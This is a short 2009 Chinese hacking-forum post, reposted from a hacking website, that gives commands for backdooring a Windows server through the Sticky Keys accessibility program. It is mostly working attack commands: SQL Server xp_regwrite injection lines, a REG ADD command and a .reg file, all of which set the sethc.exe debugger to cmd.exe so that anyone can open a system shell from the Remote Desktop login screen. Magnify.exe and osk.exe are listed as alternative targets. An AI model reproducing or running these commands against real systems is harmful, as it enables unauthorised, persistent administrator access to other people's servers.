|
发表于 2009-9-10 16:43:16
|显示全部楼层
版权所有:BK瞬间群
作者:BK群某饮料
1.能修改注册表
2.能访问3389
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','';--REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d "c:\windows\system32\cmd.exe" on /fWindows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethcasd.exe]
"debugger"="c:\\windows\\system32\\cmd.exe on"regedit
/s 导入 .reg 文件进注册表(安静模式)
/e 导出注册表文件
例:regedit /e filename.reg HKEY_LOCAL_MACHINE//SYSTEM
magnify.exe
osk.exe
sethc.exe
本篇文章来源于 新世纪网安基地 (www.520hack.com) 原文出处:http://www.520hack.com/Article/Text2/200810/11981.html |
|